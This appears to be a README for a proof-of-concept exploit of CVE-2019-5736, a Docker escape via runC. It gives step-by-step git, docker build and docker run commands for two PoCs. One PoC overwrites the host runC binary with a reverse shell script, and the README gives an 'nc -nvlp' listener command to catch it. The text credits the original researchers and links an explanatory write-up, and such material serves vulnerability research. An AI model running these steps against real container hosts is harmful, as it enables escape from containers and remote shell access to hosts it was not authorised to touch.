Video: https://bit.ly/2WqvILb
Blog Post: [www.idealhax.blogspot.com/2020/05/breaking-out-of-docker-via-runc.html]
Here, I like to mention that the original developer of this exploit is Yuval Avrahami at Twistlock Labs.
Note that running the POCs will overwrite the runC binary on the host.
It is highly recommened that you create a copy of your runC binary (normally at /usr/sbin/runc) before running one of the POCs.
Clone the repository:
$ git clone git@github.com:BBRathnayaka/RunC-CVE-2019-5736.git
Overwrites runc with a simple program that prints a string.
Running the exec POC:
$ docker build -t cve-2019-5736:exec_POC ./RunC-CVE-2019-5736/exec_POC
$ docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
$ docker exec poc_ctr bash
Overwrites runc with a simple reverse shell bash script that connects to localhost:2345.
Listen for the reverse shell:
$ nc -nvlp 2345
From a different shell, run the malicious image POC:
$ docker build -t cve-2019-5736:malicious_image_POC ./RunC-CVE-2019-5736/malicious_image_POC
$ docker run --rm cve-2019-5736:malicious_image_POC
See [Twistlock Labs](https://www.twistlock.com/labs-blog/breaking-docker-via-runc-explaining-cve-2019-5736/ "Explaining CVE-2019-5763") for an explanation of CVE-2019-5736 and the POCs.
The malicious image POC is heavily based on [q3k’s POC](https://github.com/q3k/cve-2019-5736-poc), so all credit goes to him.